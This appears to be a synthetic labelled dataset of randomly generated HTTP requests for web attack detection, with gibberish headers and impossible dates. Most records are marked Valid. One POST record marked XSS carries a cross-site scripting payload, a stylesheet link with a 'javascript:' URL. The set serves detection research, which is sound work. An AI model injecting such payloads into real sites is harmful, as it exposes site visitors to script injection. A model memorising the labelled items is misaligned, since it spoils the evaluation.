GET /copyzK8Luconnectscript9moo/gxott76l.sP/lC.zmqF1PYKeM.cgi?hnhozwgnwt=eBbDV&yi9lbicdkeiuPm=stnlttsafyMsn&toecw=t2&Ibvvowsk8o=20834&So3=642780&1ZMqU6Xp=lhleh HTTP/1.0
Host: www.nkEiwLE9.ch
Connection: keep-alive
Accept: image/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 84.226.49.215
Cookie: bn=fselectelsS;rta0a=8019;og4u4s=1836219;4basenieawmis=04nmvar1lN;tqvuhs7ei7=yGB4YCv
Cookie2: $Version="170"
Date: Wed, 13 Oct 04 12:24:35 GMT
ETag: W/"bfl4hJlbJJIa.5u"
Expect: 100-continue
From: erodgar@nLrefgs3o.org
If-Modified-Since: Fri, 16 Jun 06 22:36:51 GMT
If-Unmodified-Since: Sat, 15 Aug 09 22:35:41 GMT
If-Match: "zyDbF647Arof7H3Lg@N"
If-None-Match: "X9IcABb@NQl5BUc4Uwk"
If-Range: Tue, 04 Nov 08 06:09:03 GMT
Max-Forwards: 2
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic SXM3RDptc2cybWljbw==
Authorization: ErrC7 nlozA=surX0
Range: 28-,-887274
Referer: /IriOen.bin
TE: trailers
Trailer: Accept-Charset
User-Agent: hlal/9.4
UA-CPU: PowerPC
UA-Disp: 8694,520,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 413x553
Via: FTP/7.9 125.197.93.1:38992
Transfer-Encoding: compress
Upgrade: et7it/4.5, ubres/6.9, ano/2.1, eoeZe/8.3, Rosue/4.4
Warning: 808 224.86.131.197 "arIeIsaddssIt" 
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 7399609
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20683
Start - Id: 29129
class: Valid
GET /cpuPDysGuuTL/5BRhUtxbpZannoV/ifdrvreeAahQo/oIf/sdunEtystxttdtomb.sh?o27ehiAceeeoK=%28crehrmedb%7E&tr=+Ses&BhomeIbZcGlog8TuO=7&.5QyO=H&e6iyokus0oomti=%27xwus3%28%3Bx9&mbhvteat=efGohvw&y4g=pirrnh2ehtuid1&UMwZgCbX6ZJm=elrpwRSBWz8&eseroInb=8sWecioR&Ebel19nnuyuMve9=ez3a3rocx&awd0e=rcitsmonxfa&Ece4aneoa=136190 HTTP/1.1
Host: 175.178.77.186
Connection: close
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: ey-thE;q=0.2, t-aig1t;q=0.0, T-e1d;q=0.8, e-0Br, egdte-itt
Cache-Control: no-transform
Client-ip: 186.234.179.68
Cookie: 3zzeosIaihldmy=nyeh5risigt
Cookie2: $Version="29"
Date: Tue, 08 Sep 09 21:28:14 GMT
ETag: W/"B1-Hq3-tdE.0yKIGBz"
Expect: aegc
From: 9tlsAera@gi2n.org
If-Modified-Since: Sun, 26 Aug 07 19:28:20 GMT
If-Unmodified-Since: Mon, 06 Jun 05 20:20:36 CET
If-Match: *
If-None-Match: *
If-Range: "s3g615KixzRaYyd2f"
Max-Forwards: 9955
MIME-Version: 3.3
Pragma: De3mrh='enioessS'
Proxy-Authorization: Basic ZWVhaHJBZjc6b2Vzbw==
Authorization: NTLM aWllY2lsRGhOaGhtd3A2bm9lcGRveXRyckxzbGJzYWhkaGVmdGVObW5rZw==
Range: 71-
Referer: http://www.32alm.be/tomyrba/9osRoDDh/ebmen9n/Teiimao.php4
TE: deflate;q=0.1
Trailer: User-Agent
User-Agent: Mozilla/6.3 (X11; U; Linux i386 1.3; eS-ep; rv:8.5.1) Gecko/80672669
UA-CPU: MIPS
UA-Disp: 8585,7282,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 466x304
Via: 1.2 www.eeeNnh.html, FTP/5.8 59.50.99.7:3692, FTP/7.8 167.46.206.177
Transfer-Encoding: gzip
Upgrade: ec9/9.0, tdi/9.7, rri/1.9, iedD92/0.3, piyrsf/0.2
Warning: 235 www.aliaS.js "ienttr9bl" 
X-Forwarded-For: 244.82.254.221
X-Serial-Number: 1881707
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 29129
Start - Id: 26280
class: Valid
GET /z4DvlikerbRTbm/_GHnU/uHfLTd_i/ssviaa0e2ihuh/prialayemasmpoemy/8FUqyfTTjIHinputc/igsrm1zdIGEt/hsotentD84bohe59taa/L4Fbhmh.exe?-IY813VSU=gn67AA5elikerrbinhe&eaDewnfu=likesvt%28iuohederac&nnTbfsbae7ok=taTdocument5&ohn=ezLM&ionekpiwgctfn8n=267234677 HTTP/1.0
Host: www.srrAyu.org
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-6;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 242.118.62.113
Cookie: otma0sbnmi=nogeqiwh1itieWnei
Cookie2: $Version="28"
Date: Mon, 21 Aug 06 12:39:47 CET
ETag: "wVO5U.11JOdCxcIz4TQp"
Expect: 100-continue
From: taeoEwfn@tnh7dio.org
If-Modified-Since: Mon, 18 Sep 06 09:56:11 CET
If-Unmodified-Since: Fri, 03 Oct 08 02:56:42 UTC
If-Match: *
If-None-Match: *
If-Range: "QNM7.lV.D1eHng1Eqx"
Max-Forwards: 93
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: acru cnsecA=hl44nb3l
Authorization: nyoe lintaL=Bdp3dB
Range: -844,-3965
Referer: http://Telfa.de/wkmT4dhz/tl6rted/uatynnM6/6rbd/onaiht7I.asmx
TE: chunked;q=0.1
Trailer: If-Modified-Since
User-Agent: Mozilla/2.0 (compatible; Konqueror/1.3; Win98; shotsmn; brwt)
UA-CPU: 68000
UA-Disp: 509,4481,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 506x933
Via: 4.2 61.82.4.57
Transfer-Encoding: deflate
Upgrade: gh9st/0.8
Warning: 229 www.n61e.shtml "wbSpiker" 
X-Forwarded-For: 212.21.79.197
X-Serial-Number: 93545623104
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26280
Start - Id: 4072
class: Valid
POST /rNu7_Z61GOw/rp9wjhe.cfm? HTTP/1.1
Content-Length: 144
Content-Language: mpNzO
Content-Encoding: deflate
Content-Location: /Fdog/harz/geiou.php
Content-MD5: bXJkOGJHbUFvZWE1bWRjYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 May 07 05:25:09 UTC
Last-Modified: Mon, 28 Jun 04 19:12:03 CET
Host: www.ado8e.fr
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr, utf-8, x-mac-arabic
Accept-Encoding: compress;q=0.8, identity;q=0.5, compress;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 219.9.231.22
Cookie: eeotrXmhEe=tb.;6Mhridmu=6570;rcua6eruoedhmtn=s;t+
Cookie2: $Version="69"
Date: Sat, 02 Apr 05 03:45:46 UTC
ETag: W/"LBDyyq3DZRaZDM6A"
Expect: 100-continue
From: Erii3Szf@EEsesw.biz
If-Modified-Since: Fri, 25 Jan 08 14:57:38 CET
If-Unmodified-Since: Fri, 28 Oct 05 24:42:51 CET
If-Match: *
If-None-Match: "GbK39dr20ZwZO-9LzB"
If-Range: Thu, 04 Jan 07 12:41:51 CET
Max-Forwards: 4
MIME-Version: 1.7
Pragma: nm6eohra=E
Proxy-Authorization: Digest username="ltse"
Authorization: nvmt irs3a=4emrigh4
Range: -604,34505-,2-3423
Referer: /shytds/annab.mdb
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: eunj-ElvQ http://www.egeSdon.st
UA-CPU: 68000
UA-Disp: 055,684,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 785x5057
Via: tajng/5.5 www.ryrw.htm
Transfer-Encoding: deflate
Upgrade: ruvid/9.4, ll7tbi/9.9, raAh7/2.7, hEc/4.0, iier/4.2
Warning: 299 156.13.23.207 "9sa7wT" 
X-Forwarded-For: 68.146.106.65
X-Serial-Number: 8957401
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

ssl=@wermb8to c>hylVnph-E&tscaeEbseWxj=41826217&aeynQ=1136023769&hykte=v Nriprocessing-instruction&rtsuGudtrrrruL= &hdopwiedtsNjeEa=69101004

End - Id: 4072
Start - Id: 16978
class: Valid
GET /UncopyLYPCDw-TIQsb/tRy_J_execimgHM/6CQ/p4bF@qvB-MEZcMYH/eaewttaashni/eoedstm2doa2elH/tSsqrokg5blEjli2asle/euCOn-D.FPH.Mw.aspx?4nk1=eotmnei9c6ie&oljsgeeoiseoo4=abse6sithe+l&rsn=d_rxClhJh9T HTTP/1.1
Host: www.ap48hir62.uk
Connection: rema2d
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: mote9o-siteiD, umoa2eQ-794;q=0.0, hih-mEr;q=0.6
Cache-Control: min-fresh=3
Client-ip: 179.207.248.26
Cookie: nThorptnnDtat=and6;pfre6elldc= cgnEkriyasseg;JGopt.@xyN0=ncu;dobsihMarEid=phsr;y;qy;vLBcmailzVpsYumI=lqem stdinhtacceseifgamz+eb1oe;hmcstf=2829441
Cookie2: $Version="664"
Date: Wed, 02 Mar 05 22:59:47 CET
ETag: "8qJYmpT3W3uEsFZFC"
Expect: 100-continue
From: tilh7o8@rkyx6lf.net
If-Modified-Since: Fri, 08 Apr 05 15:57:17 GMT
If-Unmodified-Since: Fri, 10 Jun 05 14:27:34 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5512
MIME-Version: 9.9
Pragma: nae6tt='ks'
Proxy-Authorization: Basic ZWVvaXNSbDplbG9kV2VhdA==
Authorization: Digest nc=1596bdD5
Range: 17583-
Referer: http://www.15jkt8.com/7raiie/sZ6a/reczen/9Reeh.gif
TE: trailers
Trailer: Date
User-Agent: Mozilla/7.8 (compatible; ubbeAtVm; Unix; scih9eSe; tumbn; scaqtoAvn)
UA-CPU: 68000
UA-Disp: 287,215,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 366x7717
Via: FTP/7.9 www.qtIs1caE.gif:8654, 9.9 www.iatnnHl.jpeg, 6.0 209.191.34.235
Transfer-Encoding: identity
Upgrade: tCesEi/5.6, 0sr/3.1, ml8t/2.0, fde/5.2, 8hf/0.2
Warning: 236 www.kteDei.png "aaNzovzy59eaipao" 
X-Forwarded-For: 74.191.166.32
X-Serial-Number: 44944819
----: ----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 16978
Start - Id: 19287
class: Valid
GET /abnbeeEuldRYrlrri/zo/eFUphXHrd-1@QNAc/t3/lq.dll?qSetf7saSnsegbS=567768&selectYKz_P15EIxl=node4paiobindaccept&rgi5r7nsgst=m&67su=6272369&uWyhln8laer=tNZnQ&wn4ywlEJ9e=p HTTP/1.1
Host: www.daxd0h.net:103
Connection: anrt
Accept: application/*, text/*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.3, gzip;q=0.0
Accept-Language: *;q=0.8
Cache-Control: max-age=9996
Client-ip: 52.24.224.97
Cookie: oymoqyoinnggH3R=fsueno7ed1cemu;uRteTrtvedouuen=llJFl3dT
Cookie2: $Version="29"
Date: Sun, 16 Mar 08 20:22:59 CET
ETag: W/"R@fq5GO570AqeAp"
Expect: 100-continue
From: Aehridef@o4bErsthw.cz
If-Modified-Since: Mon, 22 May 06 04:18:30 CET
If-Unmodified-Since: Thu, 24 Jan 08 19:55:05 GMT
If-Match: "rNaU.3v33LMtDcyHN"
If-None-Match: *
If-Range: Sat, 11 Dec 04 16:00:13 UTC
Max-Forwards: 7
MIME-Version: 4.5
Pragma: yeogtt='dmelnulp'
Proxy-Authorization: Basic b2VrdHRyYWw6ZW44aHIyN0Q=
Authorization: Digest cnonce="eaOulm"
Range: 784688-250,21331-
Referer: /6vloip.tiff
TE: trailers,deflate;q=0.3,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.4 (compatible; 4auedfn2r8; SunOS sun4u; ebcshfrE)
UA-CPU: 68000
UA-Disp: 4381,601,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8924x1608
Via: e8S/5.9 www.hwSii6ce.gif, HTTP/3.0 14.80.64.186
Transfer-Encoding: compress
Upgrade: earoeu/7.9, ifetz/3.5, tges/2.9, Heu/7.4, ihfoks/9.4
Warning: 302 186.168.171.136 "ouehdupzgc" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 0947873125180577061
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19287
Start - Id: 28840
class: Valid
GET /etai.msf? HTTP/1.1
Host: www.cr1l.st
Connection: close
Accept: video/quicktime;q=0.8, application/*, image/gif;q=0.8
Accept-Charset: x-mac-greek;q=0.4, windows-1250, x-mac-ce;q=0.5
Accept-Encoding: *
Accept-Language: ui-yO05S;q=0.9, r9-top, e-e
Cache-Control: max-age=022
Client-ip: 200.47.34.57
Cookie: M-9nph-hS_andnode@1m=7051765;3HFeeDRl2tmwmm=46
Cookie2: $Version="77"
Date: Wed, 31 May 06 10:05:57 GMT
ETag: W/"D-LFA3Yi1z1Rsvxri"
Expect: 0aaxmbt=rgbs
From: 4zbw@syof.net
If-Modified-Since: Sun, 15 Oct 06 17:07:56 GMT
If-Unmodified-Since: Sun, 01 May 05 21:47:19 GMT
If-Match: "tV9KRyKEjm07DdCTt"
If-None-Match: "3sbpDi0TE4xQ_dn"
If-Range: Tue, 04 Jan 05 23:05:10 UTC
Max-Forwards: 0776
MIME-Version: 9.9
Pragma: dqgre=3CMh5
Proxy-Authorization: NTLM SW9oZW8yc1RiaU5lRXNzZDNwb3NsZWVzYWNRbWJpZWxkVTR4R2RxaA==
Authorization: sjahe alblmnn=tauedern
Range: 3-,-55290
Referer: http://www.3Ags49.st/jqetu/o7ed61e/IAeealoa/ifee.css
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.5 (compatible; MSIE 6.1; Unix; tio5del; enyio; OEttkutno)
UA-CPU: x86
UA-Disp: 550,6527,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 122x5513
Via: 5.8 www.LterzxcY.css:89, HTTP/3.8 128.13.200.130:81, HTTP/4.6 www.Esahy.css
Transfer-Encoding: deflate
Upgrade: EEoc/3.8, n7isho/5.6, mZTrt/4.3, tisotc/2.6
Warning: 157 www.r3hkaor.js "yoe7ri8dLNtecrho" "Tue, 22 Sep 09 04:37:42 CET"
X-Forwarded-For: 26.164.27.111
X-Serial-Number: 39502
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28840
Start - Id: 11679
class: Valid
GET /XincludeXnph-D8Uev1/tabeorakt24LpeH/60O_K/9Tarhzlerw7Mmywe/1evdlsAEfwi/opoAE6oaor.swf? HTTP/1.1
Host: www.elil5ig.org:80
Connection: eelimseg
Accept: video/*;q=0.5, audio/*, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: djsema-4
Cache-Control: no-transform
Client-ip: 37.188.138.86
Cookie: tche2hD8E7tny9=cRlW-HsYFK;nmmianlSwOta=6229;tarmra6cabx8eet=tGwN;nr2csrlis4reg=peeOZma;eeelrh2d=aa+f e3mdn
Cookie2: $Version="5"
Date: Mon, 28 Aug 06 14:43:52 GMT
ETag: W/"i@m2uYHFEOVqJN8bk-Y"
Expect: 100-continue
From: eehue@vTiniitte.gov
If-Modified-Since: Sun, 16 Nov 08 19:26:26 GMT
If-Unmodified-Since: Thu, 11 Nov 04 02:11:00 UTC
If-Match: "Hvo5P@pf.ps_gPADwed"
If-None-Match: "NgAk6wqbF4iiNYf"
If-Range: "v.59m-aagye789YQXq-"
Max-Forwards: 999
MIME-Version: 2.8
Pragma: tei8=ud
Proxy-Authorization: Digest response="d23CB2FCd6e9A6000fbAcB3afe17C8A7"
Authorization: Digest qop=auth
Range: 93-2855,61-3
Referer: /nGti9y/2toir8/3ahE/euraoorA.jsp
TE: trailers,gzip,trailers
Trailer: TE
User-Agent: ainsq2eym3nswr
UA-CPU: 68000
UA-Disp: 940,7536,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9473x212
Via: pasC/7.6 www.7yoae.html, 8.4 14.149.225.111, HTTP/0.2 www.vhdlws.png
Transfer-Encoding: identity
Upgrade: raif/5.6, ath/3.2, aqvie3/5.3
Warning: 457 70.235.212.144 "iexnltsprfrmWp" 
X-Forwarded-For: 105.168.38.104
X-Serial-Number: 2344723441
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11679
Start - Id: 16810
class: Valid
GET /r3CcE2FKlcjutT/tgnO/v5gVxN4xJXZ448xnE/nxeen/ieixut1NpvaYag/o88Iswbky2ncurmhhe.msf?e8Ohwbeoiue7r=5+cxietNcntud&tea3y=60&eerlrmmtuttjncv=slbL&itt0=i%3B+esiaaetwiC%40&s3nrsm=70&icperr4ineAer2t=gctb77ats&w9resiitabE=194&hYDSimgO=adxnha&idsdr=St&esicns3ohEee6i6=ae&c7eiset=mVlsx6LkiCG&Teteah6IsuZ=391&heue=hny&hs3sr=o8jr7m&sh9u8Rxmllocationliked=%28%3Cefet7snodece3t HTTP/1.1
Host: www.tsChneulEz.gov
Connection: Tldl
Accept: video/*;q=0.2, image/*;q=0.4, audio/basic;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a-sheib3, ogD9-atcwa6t
Cache-Control: max-age=30
Client-ip: 219.189.119.78
Cookie: 0yO0gHqaor.8d=rmee;nvhcLloneire=iaf0t2esnreektu;nrwatwoNeh=rreoa\nnF;ZqbetcnQI=lay;zbOnso=eKESNk
Cookie2: $Version="799"
Date: Wed, 13 Oct 04 24:48:09 CET
ETag: "eDJW6Hbje_@K5qFy"
Expect: 100-continue
From: eoPu@ohbrao.biz
If-Modified-Since: Wed, 14 Nov 07 04:31:10 CET
If-Unmodified-Since: Sat, 23 Dec 06 22:03:56 GMT
If-Match: *
If-None-Match: *
If-Range: "dDh5-krbotmATM_GOh"
Max-Forwards: 88
MIME-Version: 3.4
Pragma: pvio=mUhbungp
Proxy-Authorization: Digest uri=/0naYTtga/isasndt/dhsaNs/gnre.pl
Authorization: Basic Q2VhbmF0ZDpnZWRrd211
Range: 20-,951-7,269801-
Referer: /soes/xosnePub/eupij.nsf
TE: gzip;q=0.4,gzip,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.9 (Machintosh; U; PPC 0.6; et-ri; rv:2.5.9) Gecko/94465318
UA-CPU: PowerPC
UA-Disp: 081,028,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9865x006
Via: FTP/6.8 www.aTtso.jpg
Transfer-Encoding: deflate
Upgrade: ypon/2.7, buer/1.4
Warning: 241 226.111.88.138 "blstama" "Mon, 10 Jan 05 20:15:12 UTC"
X-Forwarded-For: 170.148.181.94
X-Serial-Number: 60090044663
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16810
Start - Id: 46830
class: XSS
POST /ripEt.shtml? HTTP/1.0
Content-Length: 217
Content-Language: tt
Content-Encoding: deflate
Content-Location: http://www.vwteot4T.be/bbwt/hdiTheN/aectn/t662c2.rar
Content-MD5: aW1sbmVzMWVkMmFlYzgybw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Feb 09 18:02:30 CET
Last-Modified: Mon, 12 Apr 04 10:41:14 GMT
Host: www.tzhAsno8.org:80
Connection: keep-alive
Accept: text/*, image/png;q=0.4, application/x-tar
Accept-Charset: shift_jis;q=0.4, hz-gb-2312;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 169.136.109.14
Cookie: os6rss1SgG=4847;hoGxegibeE=Ko(%iveig ?fa8wprocessing-instruction;4cFX9k=779
Cookie2: $Version="28"
Date: Sun, 29 Mar 09 04:19:54 CET
ETag: W/"st.xMfsUAx2Keg-hqF"
Expect: 100-continue
From: gUtdmw@nhajiIe.be
If-Modified-Since: Thu, 03 Jun 04 23:37:09 GMT
If-Unmodified-Since: Sat, 17 May 08 02:53:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 35
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: 04-141477,-19
Referer: http://www.i3ohd.org/eq4d.nsf
TE: deflate;q=0.6
Trailer: If-None-Match
User-Agent: inrf/6.8.7.9
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 1.8 www.uD2z.jpg, 7.8 www.tog7ty.jpeg, FTP/3.6 159.200.13.179
Transfer-Encoding: identity
Upgrade: dmhn/6.6, j0orh/4.6
Warning: 012 66.34.17.105 "buyInnrnE" 
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 072274181665
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

teyd=Ra&waoVuWnldavx=e&fOeifsQmsie=eSr&mnvcs3ftobeyoy=Obetweenll/ wE1q er&dtwpdees0naa=eTa&4itdyehoc=<link  rel  =   "   stylesheet  " href=   "    javascript: [alert    ('ri8');]"  >

End - Id: 46830
Start - Id: 10829
class: Valid
GET /pN.q-q1/duwOoIecao7uhyr2ieh/eixae/i9qNXtsMZwen.dll? HTTP/1.1
Host: www.tcaeOp.org
Connection: afulba
Accept: */*
Accept-Charset: iso-8859-9, x-mac-korean, iso-8859-8, x-mac-arabic;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 252.10.137.35
Cookie: gW@wIV=h-Kij0kJLz;ostarNai34nvtt=esh;apvcRaguacnm=548823
Cookie2: $Version="9"
Date: Sat, 05 May 07 02:46:25 CET
ETag: "PK3gNNt4OaCsMfwCt1h"
Expect: 100-continue
From: oamhlso@nd4Isktc.be
If-Modified-Since: Fri, 17 Oct 08 20:40:13 CET
If-Unmodified-Since: Fri, 29 Aug 08 19:00:34 UTC
If-Match: *
If-None-Match: "KGJYu5@1UyyPQtdqfMoD"
If-Range: Sun, 26 Jun 05 12:16:53 GMT
Max-Forwards: 4
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM bGRoYWlzQXJ0bmhzYzhrZDVubWthYXNzdWtzZG90c296YW1lc1lyZWRjZWNwZW4=
Authorization: NTLM Y25wbG1rcnM0ZW5paWV0ZUV0YWI0dGVscmRCZThyNW9jSGU=
Range: 617034-,793-
Referer: http://www.a175iti8.net/sbmj.dll
TE: trailers,chunked,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/5.0 (compatible; Konqueror/7.6; Mac OS X; r4Ritchk; atoe82bnoi)
UA-CPU: StrongARM
UA-Disp: 7212,6532,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 633x671
Via: FTP/3.0 239.255.167.129
Transfer-Encoding: utmt; il5et=etaaPm
Upgrade: 3uen/0.9, a1ts/0.4, sidhd/7.5, fsam/4.5
Warning: 710 www.o4vrf.shtml "azenesqualg1oeEe" 
X-Forwarded-For: 96.51.246.201
X-Serial-Number: 67477074905757
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10829
Start - Id: 9592
class: Valid
GET /rRzLRejBVQq.S/gyVzGPL/ljMbP5BwO@Do9e9z03zh/alteedfr.dll? HTTP/1.1
Host: www.co0me.biz
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: dst='hxn'
Client-ip: 123.189.18.103
Cookie: Dl7rayiscolt=2eq]woxsmowhereSoH;tW=pgaa9veccou;xhmerrnaIda=sltz;kdWemWvbscript=oTMlVfH;sTeeCseAnv=7t0i9Ooahmorr
Cookie2: $Version="085"
Date: Wed, 31 Oct 07 16:39:14 UTC
ETag: W/"0hswnwaB64bYimlQqyZ"
Expect: t0pna=erg0c
From: eSsaDtn@crno.be
If-Modified-Since: Fri, 18 May 07 18:03:46 CET
If-Unmodified-Since: Sun, 15 Jul 07 17:43:22 CET
If-Match: "U35.nyFj0-XC4OdzQu"
If-None-Match: *
If-Range: Mon, 09 May 05 20:34:45 GMT
Max-Forwards: 0700
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/3kteNf/fyt4nept.nsf
Authorization: e2w3 e8battw1=jte6ehf
Range: -7342
Referer: http://www.tgiroI.uk/rwyta.dll
TE: trailers,chunked,trailers
Trailer: Host
User-Agent: d5geN1m-7 http://www.nhTxehar.net
UA-CPU: 68000
UA-Disp: 932,6777,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7883x011
Via: ihs/2.8 221.88.131.1:7, 7.9 www.eTaao.png, 2.4 www.eeptfaan.tiff
Transfer-Encoding: deflate
Upgrade: aooeh/2.6
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 199.4.112.189
X-Serial-Number: 1202547378477429523
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9592
Start - Id: 22668
class: Valid
GET /br/ohoqrF2k/tutdhn/ck.htm? HTTP/1.0
Host: 203.128.68.241:80
Connection: keep-alive
Accept: application/*;q=0.9
Accept-Charset: iso-8859-6, iso-8859-7;q=0.5, windows-1250, koi8-r
Accept-Encoding: gzip;q=0.2, deflate;q=0.5, gzip;q=0.0
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 128.179.110.99
Cookie: eionu6n=7roel];rinoiTwqDq=brm;fbYU1Cboot.inix6gJ6=plinknpr
Cookie2: $Version="67"
Date: Sun, 16 Mar 08 05:30:18 UTC
ETag: "jnQdKGMrAZBmOLKG0"
Expect: aDre5
From: ohhR@ti5t.uk
If-Modified-Since: Wed, 13 Aug 08 13:17:24 CET
If-Unmodified-Since: Wed, 15 Aug 07 02:31:02 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 31 Jan 07 13:00:23 CET
Max-Forwards: 49
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: go0M6u fnxd=4kel
Authorization: Digest uri=http://www.ehgsh.gov/geebopX/o6tl/eoht8i/tzBTfOmg/ehooinn.rar
Range: -708576,-3
Referer: http://aZrgt.ch/6ats/ijeeta.mpeg
TE: trailers
Trailer: Accept-Encoding
User-Agent: nripSrsrQ (hkf7vl)
UA-CPU: Sparc
UA-Disp: 1998,0662,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0084x738
Via: 4.1 113.83.138.74:46569, 2.9 134.157.1.117:5
Transfer-Encoding: identity
Upgrade: Ttn/9.0, tP0eRt/0.6, u4tias/8.0, alon/7.6, m9oa5l/9.7
Warning: 139 www.hnsi.shtml "stteZiesi" 
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 12701556330524195
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22668
Start - Id: 22261
class: Valid
GET /MN/qt0att3666facdoaItse/h44B.6qGY7z/oiYio/nXstylehtpassaNpNiaVf_execC/rTXqWlEX58ZN7Qt/njIW2W89pB.html?p6iodnmietoEiic=ar5rr8iiollt2yp&7svqCHsXO=iboRtIyZar&ltmf5sxnruae=Sci&lC0naose=d9htzo7eaaedhrdd&yk3gexatrabs=uzglYh++drs0la&62qrstexeS=sx7IiFxwB HTTP/1.0
Host: 97.175.167.39:80
Connection: Mlrl
Accept: */*;q=0.7
Accept-Charset: cp-950, macintosh
Accept-Encoding: identity, identity
Accept-Language: *;q=0.9
Cache-Control: min-fresh=5909
Client-ip: 62.159.240.239
Cookie: Ow.uEs.q= h;oSrEjnn3s=13565019;nasaLsxnns0lai8=t;Msecoolt3M=Reibodyraccept $aftp-0a;id-;hf7ilndRdyce=Rnel3T;oe=adpa rx
Cookie2: $Version="756"
Date: Tue, 10 May 05 03:40:47 CET
ETag: "ObY@O.AdWfklhiScIg"
Expect: oz0Ted=ierRlone
From: orEtts@ismhaeter.de
If-Modified-Since: Thu, 09 Jul 09 14:20:47 UTC
If-Unmodified-Since: Sun, 05 Nov 06 10:49:52 UTC
If-Match: *
If-None-Match: "qYH4cWXXTE6Gi8DD5sXr"
If-Range: *
Max-Forwards: 9738
MIME-Version: 8.9
Pragma: reamvnIr=ca
Proxy-Authorization: ngoFt8 taaec=t7nymEoi
Authorization: Basic YXNlZTplb0Ru
Range: 654-304525,3355-81,958-920
Referer: http://www.egla7.com/yagmee/tryihblh/uRcais/ersawynf.shtml
TE: trailers
Trailer: From
User-Agent: Mozilla/6.3 (Windows; U; Win 9x 0.8; es-du; rv:8.2.0) Gecko/08687065
UA-CPU: MIPS
UA-Disp: 204,827,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 196x167
Via: 8.9 www.9rQOuhnR.jpeg
Transfer-Encoding: identity
Upgrade: 8ie/9.4, ihe/7.3, paohA/5.8, nlaLh/8.3, A1wt/0.2
Warning: 883 109.148.20.116 "sboo" "Sat, 12 Feb 05 04:41:01 CET"
X-Forwarded-For: 87.182.52.50
X-Serial-Number: 35178476793
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22261
Start - Id: 24420
class: Valid
